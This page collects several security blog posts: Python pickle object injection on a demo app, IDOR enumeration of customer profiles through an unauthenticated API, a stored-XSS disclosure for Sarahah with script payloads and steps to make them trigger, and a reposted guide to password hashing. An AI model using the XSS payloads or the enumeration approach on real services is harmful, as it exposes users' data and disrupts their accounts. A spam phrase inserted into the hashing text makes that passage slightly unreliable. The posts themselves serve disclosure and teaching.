Defencely Clarifies Python Object Injection Exploitation

 

Readers,

Welcome to Defencely Blog, This is Rony, part of the Red Teaming Operations Associate at Defencely Cloud Security Pvt. Ltd. & we are extremely delighted to present scenarios of exploitation of a recently conducted security operations for prestigious organizations in India & for Global Enterprises.

Today at Defencely Lab we are going to explain & demonstrate the Python Object Injection attack in minute details. The whole demonstration will be done with our coded intended vulnerable Application & Exploit which you can find at this Link –  Github – Python Object Injection

Contents – 

  • Introduction to Python Classes and Objects.
  • What is an Object Injection?
  • Detecting an Object Injection Attack.
  • Understanding the workflow of a Vulnerable Application.
  • Coding our own exploit against the intended Vulnerable Application.

Prerequisite – 

  • Basic Understanding on OOP Concepts.

Introduction to Python Classes and Objects.

 

What are Classes?

Class is basically a template where you store your variables & methods.

What are Objects?

Objects can be Anything, an instance of a class, a variable or a function in a class.

 

Lets go into the practical examples :-

Here you can see we have created an instance of the class named Test, and assigned the same to a variable named simpleapp passing the value of the variable rony to the Instance.

Output –

“ simpleapp = Test(rony) ”

When this particular code is executed python creates an object and then we are passing our value to the first parameter. Whenever python creates an object the __init__ function gets invoked. __init__ works like a constructor in python.

The random things which got printed with our output it’s because We are directly printing out the instance assigned variable to show how python is treating this as an object.

What is an Object Injection?

Object Injection is an Application Level Security Vulnerability that could allow an attacker to perform critical level attacks depending on the context.

Python specifically have its native module named as “Pickle” which is vulnerable to Object Injection on particular scenarios.

Python already lists pickle as risky module on their official documentation when user controlled data is passed.

We can compare the module “Pickle” with the serialize/unserialize() native functions in PHP which is also vulnerable to Object Injection when user inputs are supplied.

In Python we don’t need a magic methods as a condition to Inject into the Objects Unlike PHP.

Serializing and Deserializing in python is just Pickling and Unpickling of data.

Unpickling of data is NOT necessarily dangerous in Python until and unless user input data are passed to the process of Unpickling.

This is how Pickled and Unpickled data looks like in python –

 

Detecting an Object Injection Attack 

To achieve an Object injection, you have to do a white-box Pentest on a application. Because whenever you are pickling on complex Objects the serialized data in Python comes with the name of the class, variables & their values.

The Pickle module offers us four methods for easy and fast pickling/Unpickling.

  • dump()
  • dumps()
  • load()
  • loads()

You can find their respective functioning in Python’s Official Documentation.

As I already mentioned Unpickling of data is NOT necessarily dangerous, but If you are handling user inputs where in the backend you are pickling and unpickling the user inputted data that’s where the risk comes in. I quote – “Never Trust User Inputs”.

If the data supplied is user controlled it can obviously get tampered.

So, if you see pickled data is passing through any HTTP method, there might be a possibility of Object Injection.

 

Understanding the workflow of a Vulnerable Application

Filename: pickle.py

We will be studying the above code and tweak this accordingly to achieve an object injection.

Ignore everything else written on the code above let’s concentrate on the three things.

  • The user input which is the arg variable in this case.
  • The final_workout() method inside the class simpleApp which interestingly runs a python file.
  • The method which is called app.secureaApp() which is unpickling the inputted data.

Now lets dive deep and lets understand what role does these methods are playing.

The secureApp() method in the simpleApp() class

I am assuming that you probably have read the Python Official Documentation which i have already linked above & know the in’s and out’s of the methods used in this particular post by now.

Methods

  1. dump()
  2. dumps()
  3. load()
  4. loads()

What this secureApp() method is doing is taking a filename as an argument. Unpickling the data from the file using the load() method from the pickle module and assigning the value means the unpickled data to the variable workDone. Which is later on taken as an argument by the final_workout() method.

Let’s see what’s there on the final_workout() method.

The final_workout() method in the simpleApp() class –

This method creates a python file named code.py writes the unpickled data into the file and runs it. Simple right?

Let’s see how it looks like when we run our main vulnerable application pickle.py with the already generated serialized data.

As we can see it prints out the content from the serialized data and runs it successfully which prints out the string.

We will learn, crafting our own serialized data to do a successful object injection on the same application.

 

 

Coding our own Exploit

We now know that the pickle.py is working with the serialized data, so to serialize and making our own crafted payload we will be using the dumps() method to pickle our payloads.

And here is our final exploit to have our own serialized payload data which you can also found on the shared Github Link.

Filename:- exploit_pickle.py

 

We are going to serialize a piece of code which includes system commands with the exploit coded and test it if it works.

And we are now able to Successfully inject our own crafted codes.

I hope this will be a tremendous insight for such vulnerabilities which are well hidden in heap of crafted Enterprise Code & we are hoping to continue providing excellent security services for all kind of business houses & the enterprises in an absolute integrity.

This is Rony Das from Defencely Cloud Security Pvt. Ltd. & join you next week on Defencely Blog with more such highlights whereby our Defencely Lab exploitation goes beyond all measurements bypassing all kinds of security walls.

Thank you & have an excellent day ahead.

 

Defencely Red Team were able to Compromise Half Million Indian E-commerce Data!? How?

Welcome to Defencely Blog, This is Rony, part of the Red Teaming Operations Associate at Defencely Cloud Security Pvt. Ltd. & we are extremely delighted to present scenarios of exploitation of a recently conducted security operations for prestigious organizations in India & Abroad. This will be the same scenario which we faced while doing a security inspection on an extremely high profile target & is likely to repeat for most other organizations.

We are excluding the names of the actual target and will be demonstrating the same on a demo application which is intentionally coded for achieving the exact same scenario in order to reflect most grave mistakes developers have been making. It’s our part & parcel to make the Indian E-Commerce aware of the risks which it comes surrounded with & how compliance’s could not be met due to these potential risk factors which if immediately not resolved – would be liable & answerable to investor deck.

You can find the demo application which will be used for the demonstration on this Github Repository.

Let’s get started,

Contents – 

  • WorkFlow
  • Technical Understanding
  • Exploiting

WorkFlow – 

Basically our target had an Android Application which at this point is very susceptible to most insecure API Security Practices. Most of the Android Applications which deals with huge customer data uses APIs (Application Programming Interfaces) to make their tasks easy. And this makes it much easier to tamper things out when your API calls are done without any authentication services or let’s put as it is even with an authenticated services, there are other risks in the authentication mechanism itself. That’s where our Ops Team started enumerating.

An attacker has to be well versed & very well aware of having dealt with programming languages to build any GUI Desktop app, iOS app or any Android app to considerably know  the in’s & out’s of Event Listeners and Handlers. What this does is, detects your touch and clicks to collect data according to the invoked functions and then sends it via APIs and receive the output in the same way.

In our special scenario, there was a List of menu which were used for different tasks, our ops team started clicking on all the menus at the moment & ended with a menu named “Profile”. While intercepting the requests our testers came across an URL which was requested by the Application & that’s exactly where the target started getting interesting.

In order for our readers to understand this better, lets jump into the Technical Details.

Technical Details

NoteFurther explanation and demonstration will done using the coded example application. These details are for minute level of understanding which is very needed.

The URL looked similar to as below at the time when the application were tested for security violations:

api01.example.com/api/rest/v1/?customerId=89892381

Defencely Red Team ops hit open the URL on our customized browser look at the rendered output which we’re surprised to have a look into:

The URL was throwing the results as JSON parsed format and the same fetched out credentials which one could see in the screenshot as well above.  Please remember, this is a sample coded application & not the real details or any of it. The rendered output were every customers profile details which are extremely sensitive in nature such as their Email, Phone Number, First Name & Last Name. These details could be later used for social engineering attacks & more targeted attacks on a particular customer if it needed to be.

The most basic flaw was the API was taking inputs directly without any validations in place or a mechanism put forward for any such authorization which should had been needed in the first place. Our Red Team Ops concluded that their could be an instance of “Unauthorized API Service Calls” which would really look like an Insecure Direct Object References on OWASP Top 10 Chart.

What if an attacker can enumerate all the customer id’s & then frame a very particular script to obtain all those records given that the parameter was vulnerable to insecure direct object references given that this time an API Service calls were in place!? We replaced the integer values to determine if such changes are rendered as per our hope & voila!

At this point our Red Team Associates & security professionals were clear there were no authorization service in place due to the lack of which validation failed to check if such a service request calls should be allowed in an insecure way to gain an insecure direct object reference attack.

This meant the API were identifying their users using a Uniquely identified key, in this case it’s “customer_Id”. That’s a very real problem with the Enterprises. There were no mapping which had authorization in place for such an API call. We’re sure, many large scale enterprises are equally open to such attacks & their reputation clings on a tolls way after an investigation from compliance team given that the compliance team is enough aggressively capable of checking routinely on rampage a single unclosed vulnerability might cost.

Defencely was able to code a script to know exact numbers of registered users, this script can be found at Simple Python Script to guess the range.

Now let’s simplify the exploitation process.

Exploitation

Defencely created another Python Script for the Proof of Concept showing to the company & to simplify the attack as well in order to demonstrate the grave concern to senior managers & the management team which quickly later reacted to it’s closure of the threat uncovered by the Red Team Operations.

 

Taking out users credentials, remember these same credentials could be harvested & mounted to their social account profiles as most of the time, credentials will always be the same for a victim:

 

That’s all we have for now. Let’s look forward to more amazement at Defencely Red Team Operations Labs next week for absolutely yet another amazing uncover story of how we’re adding value to our customerbase with insider threat program as well as routine sound-ful & an offensive Vulnerability Assessment followed by a Penetration Test for critical applications both at the staging level & production bases. Our manual security assessments methods have proved the best value. Feel free to touchbase at shritam@defencely.com, Shritam Bhowmick, Red Team Lead @Defencely for any Security Operations Related queries or say “Hi” to us at hi@defencely.com for inquiries.

We should see you again next week with another operational tale of the broad security premises where 0days are always a possibility & at proximity of a security compliance issue which always will be a sooner or later decision by the Indian E-Commerce Management & stakeholders.

Let’s act pro-actively.

Achieving Code Injection on Trendy – Sarahah.com

Hello Readers,

Welcome to Defencely, I’m Rony, part of the red teaming operations at Defencely Cloud Security Pvt. Ltd. & we conduct security operations for prestigious organizations in India & Abroad. We would like to throw security concerns related to a trending application named ‘Sarahah’ & I hope my viewers would love this detailed security inspection of the application & learn from developers mistakes.

We have kept the content very specific & simple to understand for your viewers as we understand our efforts to achieve a continuous conscious security are necessary to help developers fix their security loopholes timely. Defencely has already reported the Code Injection concern to the developers with a proper timeline & as per it’s policy of a full disclosure.

We’re yet awaiting for a fix which has expired since then. In order to help users, we’re attempting at a full disclosure.

Contents – 

  • Application Overview.
  • The Workflow.
  • Exploiting the Trend.

Application Overview –

What is Sarahah?

Sarahah is an application, which let you help get feedbacks anonymously from your friends and coworkers. Atleast that’s what Sarahah says & plans to extend the features.

How it works?

First of all, Sarahah would let you register to their website, and once done Sarahah offers you a personal dashboard with a link with your name which you can share in Social networks and you will receive anonymous feedbacks.

As a Penetration Tester, Before attempting any exploitation into the target one needs to enumerate very well in order for a quality assessment. So here comes a Technical Understanding of the Application.

The WorkFlow –

Everything starts after we sign up for Sarahah.com. Let’s understand the WorkFlow from the point of view of a Penetration Tester. 

As a Penetration Tester, one needs to know Users inputs can take you from zero to a successful security audit real quick.

That’s where we started fuzzing around the user inputs, which is basically in this case are your friends and co-workers who will be sending you anonymous feedbacks & this nature isn’t possible if the application was not allowing taking inputs from the audience.

  1. You are creating a account.
  2. Your friends are sending you feedbacks through a form publicly available.
  3. The feedbacks are getting displayed in your dashboard.
  4. Which means the Feedbacks are getting saved to the database and later on echo’ed off to your dashboard.

What if Sarahah is not sanitizing the user inputs? Can we initiate code injections

Exploit the Trend –

We sent a simple and classic snippet of JavaScript code to my own dashboard.

Payload:  <script>alert("Hello, Vulnerable!");</script>
Sarahah1

 

This Javascript code should pop-up a ‘Alert Box’ into the user’s dashboard. Let’s check if we got a Popup?
Sarahah 2

Nope, we didn’t got any pop-up right? The code we tried injecting to the application, just echos off back to dashboard rather than getting injected right?

So what we did is, We enumerated around the application & noted an AJAX request going into the server and calling the next contents in JSON format and parses them back to the dashboard which means we have got our second attack surface.

One can look at our payload in the JSON Request:
JSON req

But there’s a twist. The event gets called every time when you scroll down,  then an AJAX request is made through the URL,

https://sarahah.com/Messages/GetReceivedMessagePage?page=1″

and then the Contents from JSON result gets parsed and echos off them back to the dashboard.

Sarahah Developers messed up when they are parsing contents from the JSON result, and that is the point they are not filtrating the special characters anymore.

So how we are going to trigger the XSS?

  1. The first thing you need to keep in mind that, you need to make the user scroll down so that AJAX request is made.
  2. Send the payload to user.
  3. And then flood the users dashboard with some random messages(Approximately around 20-30). This is how you will make the user scroll down to see the messages where your payload is included too.
  4. Once the user scrolls down, the AJAX request is made, all the contents of the next page gets parsed(which includes your XSS payload) and Sarahah echos them back to the dashboard.

And

Your XSS gets immediately triggered –
XSSpop

This pop-up “Hello, You got hacked” will keep poping into the user’s dashboard until and unless the user deletes that particular feedback.

Here an attacker can easily irritate the users just by changing their payload to something  –

Payload:

<script>

while(1){

alert(“You are getting hacked!”)

}

</script>

This is a continuous loop, because 1 is always true. Hence the pop-up will be continuous. We recommend Sarahah Developer to fix this nature & have already attempted sending them the cure for the itch.

Do you rely on Hashing? Know WebSec Cryptography Indepth!

Credits: Thomas Pornin

For storing passwords hashes, you need an algorithm slow enough that brute-force attacks are not feasible. Salting the password will help against rainbow attacks, but not against brute-force attacks. For storing password hashes, you need to use an algorithm specifically designed for this purpose; such as:

scrypt is new but interesting because it not only uses a variable work factor but also memory-hard functions. This dramatically increases the cost of brute-force attacks, because both running-time and memory requirements are increased.

The Theory

We need to hash passwords as a second line of defence. A server which can authenticate users necessarily contains, somewhere in its entrails, some data which can be used to validate a password. A very simple system would just store the passwords themselves, and validation would be a simple comparison. But if a hostile outsider were to gain a simple glimpse at the contents of the file or database table which contains the passwords, then that attacker would learn a lot. Unfortunately, such partial, read-only breaches do occur in practice (a mislaid backup tape, a decommissioned but not wiped-out hard disk, an aftermath of a SQL injection attack — the possibilities are numerous). See this blog post for a detailed discussion.

Since the overall contents of a server that can validate passwords are necessarily sufficient to indeed validate passwords, an attacker who obtained a read-only snapshot of the server is in position to make an offline dictionary attack: he tries potential passwords until a match is found. This is unavoidable. So we want to make that kind of attack as hard as possible. Our tools are the following:

  • Cryptographic hash functions: these are fascinating mathematical objects which everybody can compute efficiently, and yet nobody knows how to invert them. This looks good for our problem – the server could store a hash of a password; when presented with a putative password, the server just has to hash it to see if it gets the same value; and yet, knowing the hash does not reveal the password itself.
  • Salts: among the advantages of the attacker over the defender is parallelism. The attacker usually grabs a whole list of hashed passwords, and is interested in breaking as many of them as possible. He may try to attack several in parallels. For instance, the attacker may consider one potential password, hash it, and then compare the value with 100 hashed passwords; this means that the attacker shares the cost of hashing over several attacked passwords. A similar optimisation is precomputed tables, including rainbow tables; this is still parallelism, with a space-time change of coordinates.The common characteristic of all attacks which use parallelism is that they work over several passwords which were processed with the exact same hash function. Salting is about using not one hash function, but a lot of distinct hash functions; ideally, each instance of password hashing should use its own hash function. A salt is a way to select a specific hash function among a big family of hash functions. Properly applied salts will completely thwart parallel attacks (including rainbow tables).
  • Slowness: computers become faster over time (Gordon Moore, co-founder of Intel, theorized it in his famous law). Human brains do not. This means that attackers can “try” more and more potential passwords as years pass, while users cannot remember more and more complex passwords (or flatly refuse to). To counter that trend, we can make hashing inherently slow by defining the hash function to use a lot of internal iterations (thousands, possibly millions).

We have a few standard cryptographic hash functions; the most famous are MD5 and the SHA family. Building a secure hash function out of elementary operations is far from easy. When cryptographers want to do that, they think hard, then harder, and organize a tournament where the functions fight each other fiercely. When hundreds of cryptographers gnawed and scraped and punched at a function for several years and found nothing bad to say about it, then they begin to admit that maybe that specific function could be considered as more or less secure air jordan sale. This is just what happened in the SHA-3 competition. We have to use this way of designing hash function because we know no better way. Mathematically, we do not know if secure hash functions actually exist; we just have “candidates” (that’s the difference between “it cannot be broken” and “nobody in the world knows how to break it”).

A basic hash function, even if secure as a hash function, is not appropriate for password hashing, because:

  • it is unsalted, allowing for parallel attacks (rainbow tables for MD5 or SHA-1 can be obtained for free, you do not even need to recompute them yourself);
  • it is way too fast, and gets faster with technological advances. With a recent GPU (i.e. off-the-shelf consumer product which everybody can buy), hashing rate is counted in billions of passwords per second.

So we need something better. It so happens that slapping together a hash function and a salt, and iterating it, is not easier to do than designing a hash function — at least, if you want the result to be secure. There again, you have to rely on standard constructions which have survived the continuous onslaught of vindicative cryptographers.

Good Password Hashing Functions

PBKDF2

PBKDF2 comes from PKCS#5. It is parameterized with an iteration count (an integer, at least 1, no upper limit), a salt (an arbitrary sequence of bytes, no constraint on length), a required output length (PBKDF2 can generate an output of configurable length), and an “underlying PRF”. In practice, PBKDF2 is always used with HMAC, which is itself a construction built over an underlying hash function. So when we say “PBKDF2 with SHA-1”, we actually mean “PBKDF2 with HMAC with SHA-1”.

Advantages of PBKDF2:

  • Has been specified for a long time, seems unscathed for now.
  • Is already implemented in various framework (e.g. it is provided with .NET).
  • Highly configurable (although some implementations do not let you choose the hash function, e.g. the one in .NET is for SHA-1 only).
  • Received NIST blessings (modulo the difference between hashing and key derivation; see later on).
  • Configurable output length (again, see later on).

Drawbacks of PBKDF2:

  • CPU-intensive only, thus amenable to high optimization with GPU (the defender is a basic server which does generic things, i.e. a PC, but the attacker can spend his budget on more specialized hardware, which will give him an edge).
  • You still have to manage the parameters yourself (salt generation and storage, iteration count encoding…). There is a standard encoding for PBKDF2 parameters but it uses ASN.1 so most people will avoid it if they can (ASN.1 can be tricky to handle for the non-expert).

bcrypt

bcrypt was designed by reusing and expanding elements of a block cipher called Blowfish. The iteration count is a power of two, which is a tad less configurable than PBKDF2, but sufficiently so nevertheless. This is the core password hashing mechanism in the OpenBSD operating system.

Advantages of bcrypt:

  • Many available implementations in various languages (see the links at the end of the Wikipedia page).
  • More resilient to GPU; this is due to details of its internal design. The bcrypt authors made it so voluntarily: they reused Blowfish because Blowfish was based on an internal RAM table which is constantly accessed and modified throughout the processing. This makes life much harder for whoever wants to speed up bcrypt with a GPU (GPU are not good at making a lot of memory accesses in parallel).
  • Standard output encoding which includes the salt, the iteration count and the output as one simple to store character string of printable characters.

Drawbacks of bcrypt:

  • Output size is fixed: 192 bits.
  • While bcrypt is good at thwarting GPU, it can still be thoroughly optimized with FPGA: modern FPGA chips have a lot of small embedded RAM blocks which are very convenient for running many bcrypt implementations in parallel within one chip. It has been done.
  • Input password size is limited to 51 characters. In order to handle longer passwords, one has to combine bcrypt with a hash function (you hash the password and then use the hash value as the “password” for bcrypt). Combining cryptographic primitives is known to be dangerous (see above) so such games cannot be recommended on a general basis.

scrypt

scrypt is a much newer construction (designed in 2009) which builds over PBKDF2 and a stream cipher called Salsa20/8, but these are just tools around the core strength of scrypt, which is RAM. scrypt has been designed to inherently use a lot of RAM (it generates some pseudo-random bytes, then repeatedly read them in a pseudo-random sequence). “Lots of RAM” is something which is hard to make parallel. A basic PC is good at RAM access, and will not try to read dozens of unrelated RAM bytes simultaneously. An attacker with a GPU or a FPGA will want to do that, and will find it difficult.

Advantages of scrypt:

  • A PC, i.e. exactly what the defender will use when hashing passwords, is the most efficient platform (or close enough) for computing scrypt. The attacker no longer gets a boost by spending his dollars on GPU or FPGA.
  • One more way to tune the function: memory size.

Drawbacks of scrypt:

  • Still new (my own rule of thumb is to wait at least 5 years of general exposure, so no scrypt for production until 2014 – but, of course, it is best if other people try scrypt in production, because this gives extra exposure).
  • Not as many available, ready-to-use implementations for various languages.
  • Unclear whether the CPU / RAM mix is optimal. For each of the pseudo-random RAM accesses, scrypt still computes a hash function. A cache miss will be about 200 clock cycles, one SHA-256 invocation is close to 1000. There may be room for improvement here.
  • Yet another parameter to configure: memory size.

OpenPGP Iterated And Salted S2K

I cite this one because you will use it if you do password-based file encryption with GnuPG. That tool follows the OpenPGP format which defines its own password hashing functions, called “Simple S2K”, “Salted S2K” and “Iterated and Salted S2K“. Only the third one can be deemed “good” in the context of this answer. It is defined as the hash of a very long string (configurable, up to about 65 megabytes) consisting of the repetition of an 8-byte salt and the password.

As far as these things go, OpenPGP’s Iterated And Salted S2K is decent; it can be considered as similar to PBKDF2, with less configurability. You will very rarely encounter it outside of OpenPGP, as a stand-alone function.

Unix “crypt”

Recent Unix-like systems (e.g. Linux), for validating user passwords, use iterated and salted variants of the crypt() function based on good hash functions, with thousands of iterations. This is reasonably good. Some systems can also use bcrypt, which is better.

The old crypt() function, based on the DES block cipher, is not good enough:

  • It is slow in software but fast in hardware, and can be made fast in software too but only when computing several instances in parallel (technique known as SWAR or “bitslicing”). Thus, the attacker is at an advantage.
  • It is still quite fast, with only 25 iterations.
  • It has a 12-bit salt, which means that salt reuse will occur quite often.
  • It truncates passwords to 8 characters (characters beyond the eighth are ignored) and it also drops the upper bit of each character (so you are more or less stuck with ASCII).

But the more recent variants, which are active by default, will be fine.

Bad Password Hashing Functions

About everything else, in particular virtually every homemade method that people relentlessly invent.

For some reason, many developers insist on designing function themselves, and seem to assume that “secure cryptographic design” means “throw together every kind of cryptographic or non-cryptographic operation that can be thought of”. See this question for an example. The underlying principle seems to be that the sheer complexity of the resulting utterly tangled mess of instruction will befuddle attackers. In practice, though, the developer himself will be more confused by his own creation than the attacker.

Complexity is bad. Homemade is bad. New is bad. If you remember that, you’ll avoid 99% of problems related to password hashing, or cryptography, or even security in general.

Password hashing in Windows operating systems used to be mindbogglingly awful and now is just terrible (unsalted, non-iterated MD4).

Key Derivation

Up to now, we considered the question of hashing passwords. A close problem is about transforming a password into a symmetric key which can be used for encryption; this is called key derivation and is the first thing you do when you “encrypt a file with a password”.

It is possible to make contrived examples of password hashing functions which are secure for the purpose of storing a password validation token, but terrible when it comes to generating symmetric keys; and the converse is equally possible. But these examples are very “artificial”. For practical functions like the one described above:

  • The output of a password hashing function is acceptable as a symmetric key, after possible truncation to the required size.
  • A Key Derivation Function can serve as a password hashing function as long as the “derived key” is long enough to avoid “generic preimages” (the attacker is just lucky and finds a password which yields the same output). An output of more than 100 bits or so will be enough.

Indeed, PBKDF2 and scrypt are KDF, not password hashing function — and NIST “approves” of PBKDF2 as a KDF, not explicitly as a password hasher (but it is possible, with only a very minute amount of hypocrisy, to read NIST’s prose in such a way that it seems to say that PBKDF2 is good for hashing passwords).

Conversely, bcrypt is really a block cipher (the bulk of the password processing is the “key schedule”) which is then used in CTR mode to produce three blocks (i.e. 192 bits) of pseudo-random output, making it a kind of hash function. bcrypt can be turned into a KDF with a little surgery, by using the block cipher in CTR mode for more blocks. But, as usual, we cannot recommend such homemade transforms. Fortunately, 192 bits are already more than enough for most purposes (e.g. symmetric encryption with GCM or EAX only needs a 128-bit key).

Miscellaneous Topics

How many iterations ?

As much as possible ! This salted-and-slow hashing is an arms race between the attacker and the defender. You use many iterations to make the hashing of a password harder for everybody. To improve security, you should set that number as high as you can tolerate on your server, given the tasks that your server must otherwise fulfill. Higher is better.

Collisions and MD5

MD5 is broken: it is computationally easy to find a lot of pairs of distinct inputs which hash to the same value. These are called collisions.

However, collisions are not an issue for password hashing. Password hashing requires the hash function to be resistant to preimages, not to collisions. Collisions are about finding pairs of messages which give the same output without restriction, whereas in password hashing the attacker must find a message which yields a given output that the attacker does not get to choose. This is quite different. As far as we known, MD5 is still (almost) as strong as it has ever been with regards to preimages (there is a theoretical attack which is still very far in the ludicrously impossible to run in practice).

The real problem with MD5 as it is commonly used in password hashing is that it is very fast, and unsalted. However, PBKDF2 used with MD5 would be robust. You should still use SHA-1 or SHA-256 with PBKDF2, but for Public Relations. People get nervous when they hear “MD5”.

Salt Generation

The main and only point of the salt is to be as unique as possible. Whenever a salt value is reused anywhere, this has the potential to help the attacker.

For instance, if you use the user name as salt, then an attacker (or several colluding attackers) could find it worthwhile to build rainbow tables which attack the password hashing function when the salt is “admin” (or “root” or “joe”) because there will be several, possibly many sites around the world which will have a user named “admin”. Similarly, when a user changes his password, he usually keeps his name, leading to salt reuse. Old passwords are valuable targets, because users have the habit of reusing passwords in several places (that’s known to be a bad idea, and advertised as such, but they will do it nonetheless because it makes their life easier), and also because people tend to generate their passwords “in sequence”: if you learn that Bob’s old password is “SuperSecretPassword37”, then Bob’s current password is probable “SuperSecretPassword38” or “SuperSecretPassword39”.

The cheap way to obtain uniqueness is to use randomness. If you generate your salt as a sequence of random bytes from the cryptographically secure PRNG that your operating system offers (/dev/urandom, CryptGenRandom()…) then you will get salt values which will be “unique with a sufficiently high probability”. 16 bytes are enough so that you will never see a salt collision in your life, which is overkill but simple enough.

UUID are a standard way of generating “unique” values. Note that “version 4” UUID just use randomness (122 random bits), like explained above. A lot of programming frameworks offer simple to use functions to generate UUID on demand, and they can be used as salts.

Salt Secrecy

Salts are not meant to be secret; otherwise we would call them keys. You do not need to make salts public, but if you have to make them public (e.g. to support client-side hashing), then don’t worry too much about it. Salts are there for uniqueness. Strictly speaking, the salt is nothing more than the selection of a specific hash function within a big family of functions.

“Pepper”

Cryptographers can never let a metaphor alone; they must extend it with further analogies and bad puns. “Peppering” is about using a secret salt, i.e. a key. If you use a “pepper” in your password hashing function, then you are switching to a quite different kind of cryptographic algorithm; namely, you are computing a Message Authentication Code over the password. The MAC key is your “pepper”.

Peppering makes sense if you can have a secret key which the attacker will not be able to read. Remember that we use password hashing because we consider that an attacker could grab a copy of the server database, or possible of the whole disk of the server. A typical scenario would be a server with two disks in RAID 1. One disk fails (electronic board fries – this happens a lot). The sysadmin replaces the disk, the mirror is rebuilt, no data is lost due to the magic of RAID 1. Since the old disk is dysfunctional, the sysadmin cannot easily wipe its contents. He just discards the disk. The attacker searches through the garbage bags, retrieves the disk, replaces the board, and lo! He has a complete image of the whole server system, including database, configuration files, binaries, operating system… the full monty, as the British say. For peppering to be really applicable, you need to be in a special setup where there is something more than a PC with disks; you need a HSM. HSM are very expensive, both in hardware and in operational procedure. But with a HSM, you can just use a secret “pepper” and process passwords with a simple HMAC (e.g. with SHA-1 or SHA-256). This will be vastly more efficient than bcrypt/PBKDF2/scrypt and their cumbersome iterations. Also, usage of a HSM will look extremely professional when doing a WebTrust audit.

Client-side hashing

Since hashing is (deliberately) expensive, it could make sense, in a client-server situation, to harness the CPU of the connecting clients. After all, when 100 clients connect to a single server, the clients collectively have a lot more muscle than the server.

To perform client-side hashing, the communication protocol must be enhanced to support sending the salt back to the client. This implies an extra round-trip, when compared to the simple client-sends-password-to-server protocol. This may or may not be easy to add to your specific case.

Client-side hashing is difficult in a Web context because the client uses Javascript, which is quite anemic for CPU-intensive tasks.

In the context of SRP, password hashing necessarily occurs on the client side.

Conclusion

Use bcrypt. PBKDF2 is not bad either. If you use scrypt you will be a “slightly early adopter” with the risks that are implied by this expression; but it would be a good move for scientific progress (“crash dummy” is a very honorable profession).